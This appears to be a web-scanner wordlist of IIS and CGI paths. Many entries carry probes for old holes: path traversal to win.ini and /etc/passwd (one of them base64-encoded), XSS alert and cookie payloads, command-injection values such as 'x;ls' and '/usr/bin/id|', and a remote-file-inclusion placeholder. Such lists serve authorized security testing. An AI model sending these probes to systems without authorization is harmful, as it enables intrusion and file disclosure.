OneListForAll/dict/iis_long.txt

.access
.cobalt
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
.fhp
.htaccess
.htaccess.old
.htaccess.save
.htaccess~
.htpasswd
.nsconfig
.passwd
.printer
.www_acl
.wwwacl
14all-1.1.cgi?cfg=../../../../../../../..win.ini
14all.cgi?cfg=../../../../../../../..win.ini
<script>alert('XSS')</script>.aspx
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
_vti_bin/
_vti_bin/_vti_aut/fp30reg.dll
_vti_pvt/
_vti_pvt/doctodep.btr
_WEB_INF/
a1disp3.cgi?../../../../../../../../../..win.ini
a1stats/a1disp3.cgi?../../../../../../../../../..win.ini
a1stats/a1disp3.cgi?../../../../../../..win.ini
a1stats/a1disp4.cgi?../../../../../../..win.ini
AccessPlatform/
AccessPlatform/auth/
AccessPlatform/auth/clientscripts/
AccessPlatform/auth/clientscripts/cookies.js
AccessPlatform/auth/clientscripts/login.js
add_ftp.cgi
addbanner.cgi
adduser.cgi
admin.cgi
admin.cgi?list=../../../../../../../../../..win.ini
admin.php
admin.php3
admin.pl
adminhot.cgi
adminwww.cgi
adovbs.inc
aglimpse
aglimpse.cgi
amadmin.pl
anacondaclip.pl?template=../../../../../../../../../..win.ini
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
AnyBoard.cgi
anyboard.cgi
AnyForm
AnyForm2
archie
architext_query.cgi
architext_query.pl
ash
aspnet_files/
astrocam.cgi
AT-admin.cgi
AT-generate.cgi
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
auction/auction.cgi?action=
auctiondeluxe/auction.pl
auktion.cgi?menue=../../../../../../../../../..win.ini
auth_data/auth_user_file.txt
awl/auctionweaver.pl
awstats.pl
awstats/awstats.pl
ax-admin.cgi
ax.cgi
axs.cgi
Backup/add-passwd.cgi
badmin.cgi
banner.cgi
bannereditor.cgi
bash
bb-hist?HI
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs_forum.cgi
betsie/parserl.pl/<script>alert('XSS')</script>;
bigconf.cgi?command=view_textfile&file=win.ini&filters=
bizdb1-search.cgi
blog/
blog/mt-check.cgi
blog/mt-load.cgi
blog/mt.cfg
bnbform
bnbform.cgi
boozt/admin/index.cgi?section=5&input=1
bsguest.cgi?email=x;ls
bslist.cgi?email=x;ls
build.cgi
bulk/bulk.cgi
C
c_download.cgi
cached_feed.cgi
cachemgr.cgi
calendar
calendar.pl
calendar/index.cgi
calender_admin.pl
cart.pl
cart.pl?db='
cartmanager.cgi
cbmc/forums.cgi
ccbill-local.cgi?cmd=MENU
ccbill-local.pl?cmd=MENU
certcontrol/
certenroll/
certsrv/
cgforum.cgi
cgi
cgi-bin/htmlscript
cgi-lib.pl
cgicso?query=<script>alert('XSS')</script>
cgicso?query=AAA
cgiwrap
cgiwrap/~@U
cgiwrap/~JUNK(5)
cgiwrap/~root
change-your-password.pl
citrix/
Citrix//AccessPlatform/auth/clientscripts/cookies.js
citrix/AccessPlatform/auth/
citrix/AccessPlatform/auth/clientscripts/
Citrix/AccessPlatform/auth/clientscripts/login.js
Citrix/PNAgent/config.xml
classified.cgi
classifieds
classifieds.cgi
classifieds/classifieds.cgi
classifieds/index.cgi
clickcount.pl?view=test
clickresponder.pl
code.php
code.php3
com5..........................................................................................................................................................................................................................box
com5.java
com5.pl
commandit.cgi
common.php?f=0&ForumLang=../../../../../../../../../..win.ini
common/listrec.pl
compatible.cgi
Count.cgi
count.cgi
counter-ord
counterbanner
counterbanner-ord
counterfiglet-ord
counterfiglet/nc/
cs
csh
csLive
csNews.cgi
csPassword.cgi
csPassword/csPassword.cgi
cstat.pl
cutecast/members/
cvsblame.cgi?file=<script>alert('XSS')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cvslog.cgi?file=<script>alert('XSS')</script>
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
dasp/fm_shell.asp
data/fetch.php?page=
date
day5datacopier.cgi
day5datanotifier.cgi
db2www/library/document.d2w/show
db4web_c/dbdirname/win.ini
db_manager.cgi
dbman/db.cgi?db=no-db
DC
DCFORM
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
dfire.cgi
diagnose.cgi
dig.cgi
displayTC.pl
dnewsweb
donothing
dose.pl?daily&somefile.txt&|ls|
download.cgi
dumpenv.pl
edit.pl
empower?DB=whateverwhatever
enter.cgi
environ.cgi
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
ex-logger.pl
Exadmin/
Exchange/
exchange/root.asp
ExchWeb/
excite
excite;IF
ezadmin.cgi
ezboard.cgi
ezman.cgi
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..win.ini&distinct=1
ezshopper2/loadpage.cgi
ezshopper3/loadpage.cgi
File
filemail
filemail.pl
finger
finger.pl
flexform
flexform.cgi
fom.cgi?file=<script>alert('XSS')</script>
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
formmail
formmail.cgi
FormMail.cgi?<script>alert(\
FormMail.pl
formmail.pl
fortune
forum.asp
forum_arc.asp
forum_professionnel.asp
ftp.pl
ftpsh
gbadmin.cgi?action=change_adminpass
gbadmin.cgi?action=change_automail
gbadmin.cgi?action=colors
gbadmin.cgi?action=setup
gbook/gbook.cgi?_MAILTO=xx;ls
gbpass.pl
getdoc.cgi
gettransbitmap
gH.cgi
glimpse
gm-authors.cgi
gm-cplog.cgi
gm.cgi
guestbook.cgi
guestbook.pl
guestbook/passwd
handler.cgi
hitview.cgi
horde/test.php
horde/test.php?mode=phpinfo
htgrep?file=index.html&hdr=win.ini
html2chtml.cgi
html2wml.cgi
htmlscript?../../../../../../../../../..win.ini
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
ibill.pm
icat
if/admin/nph-build.cgi
iiasdmpwd/
iisadmin/
iisadmpwd/achg.htr
iisadmpwd/aexp.htr
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
iisadmpwd/anot.htr
iisadmpwd/anot3.htr
iishelp/
iishelp/iis/misc/default.asp
iissamples/
ikonboard/help.cgi?
imageFolio.cgi
ImageFolio/admin/admin.cgi
imagefolio/admin/admin.cgi
imagemap
imprimer.asp
include/new-visitor.inc.php
includes/adovbs.inc
index.js0x70
index.pl
index.shtml
info2www
info2www '(../../../../../../../bin/mail root <win.ini>
infosrch.cgi
ion-p?page=../../../../..win.ini
jailshell
jj
ksh
lastlines.cgi?process
listrec.pl
loadpage.cgi?user_id=1&file=../../../../../../../../../..win.ini
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
log-reader.cgi
log/
log/nether-log.pl?checkit
login.cgi
login.pl
login.pl?course_id=\
logit.cgi
logs.pl
logs/
logs/access_log
logs/error_log
lookwho.cgi
ls
LWGate
lwgate
LWGate.cgi
lwgate.cgi
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..win.ini
mail
mailit.pl
maillist.cgi
maillist.pl
mailnews.cgi
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..win.ini
majordomo.pl
man2html
mastergate/search.cgi?search=0&search_on=all
meta.pl
mgrqcgi
Microsoft-Server-ActiveSync/
mini_logger.cgi
mmstdod.cgi
moin.cgi?test
mojo/mojo.cgi
mrtg.cfg?cfg=../../../../../../../..win.ini
mrtg.cgi?cfg=../../../../../../../..win.ini
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
msadc/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
musicqueue.cgi
myguestbook.cgi?action=view
namazu.cgi
nbmember.cgi?cmd=list_all_users
netauth.cgi?cmd=show&page=../../../../../../../../../..win.ini
netpad.cgi
newsdesk.cgi?t=../../../../../../../../../..win.ini
nimages.php
nlog-smb.cgi
nlog-smb.pl
non-existent.pl
noshell
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
ntitar.pl
null.htw
OMA/
opendir.php?win.ini
orders/orders.txt
OWA/
pagelog.cgi
pals-cgi?palsAction=restart&documentName=win.ini
parse-file
pass
passwd
passwd.txt
password
pbserver/pbserver.dll
perl
perl?-v
perlshop.cgi
pfdispaly.cgi?../../../../../../../../../..win.ini
phf
phf.cgi?QALIA
photo/
photo/manage.cgi
photo/protected/manage.cgi
php-cgi
php.cgi?win.ini
plusmail
pollit/Poll_It_
pollssi.cgi
post-query
post_query
postcards.cgi
postinfo.html
powerup/r.cgi?FILE=../../../../../../../../../..win.ini
printenv
printenv.tmp
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
profile.cgi
pu3.pl
Public/
query
quikstore.cfg
quizme.cgi
r.cgi?FILE=../../../../../../../../../..win.ini
ratlog.cgi
redirect
register.cgi
replicator/webpage.cgi/
responder.cgi
retrieve_password.pl
rksh
rmp_query
robadmin.cgi
robpoll.cgi
rpm_query
rsh
rtm.log
rubrique.asp
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sbcgi/sitebuilder.cgi
scoadminreg.cgi
scripts/
scripts/cgimail.exe
scripts/convert.bas
scripts/counter.exe
scripts/fpcount.exe
scripts/iisadmin/ism.dll?http/dir
scripts/no-such-file.pl
scripts/samples/search/webhits.exe
scripts/tools/getdrvs.exe
scripts/tools/newdsn.exe
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?searchstring=<script>alert(document.cookie)</script>
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
sendform.cgi
sendtemp.pl?templ=../../../../../../../../../..win.ini
session/adminlogin
sewse?/home/httpd/html/sewse/jabber/comment2.jse+win.ini
sh
share/
shop.cgi?page=../../../../../../..win.ini
shop/auth_data/auth_user_file.txt
shop/orders/orders.txt
shopper.cgi?newpage=../../../../../../../../../..win.ini
show.pl
showcheckins.cgi?person=<script>alert('XSS')</script>
showuser.cgi
simplestguest.cgi
simplestmail.cgi
spin_client.cgi?aaaaaaaa
ss
sscd_suncourier.pl
stat.pl
stat/
stats-bin-p/reports/index.html
stats.pl
stats.prf
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
statusconfig.pl
statview.pl
store.cgi?
store/agora.cgi?cart_id=<script>alert('XSS')</script>
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../..win.ini
survey
survey.cgi
sws/admin.html
sws/manager.pl
tablebuild.pl
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..win.ini
test-cgi.tcl
test-cgi?/*
test-env
test.cgi
test/test.cgi
texis/junk
texis/phine
textcounter.pl
tidfinder.cgi
tigvote.cgi
title.cgi
tpgnrock
traffic.cgi?cfg=../../../../../../../..win.ini
troops.cgi
tsweb/
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..win.ini
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
update.dpgs
upload.cgi
Upload.pl
uptime
ustorekeeper.pl?command=goto&file=../../../../../../../../../..win.ini
utm/admin
utm/utm_stat
view-source
view-source?view-source
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewlogs.pl
viewsource?win.ini
viralator.cgi
virgil.cgi
vote.cgi
vpasswd.cgi
vq/demos/respond.pl?<script>alert('XSS')</script>
Vs
W
w3-msql
w3-sql
wais.pl
webais
webbbs.cgi
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webdriver
webgais
webif.cgi
webmap.cgi
webnews.pl
webplus?about
webplus?script=../../../../../../../../../..win.ini
websendmail
webspirs.cgi?sp.nextform=../../../../../../../../../..win.ini
webutil.pl
webutils.pl
webwho.pl
windmail
wrap
wrap.cgi
ws_ftp.ini
www-sql
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwstats.pl
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
x.htw
x.ida
x.idq
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
zsh
~/<script>alert('XSS')</script>.asp
~/<script>alert('XSS')</script>.aspx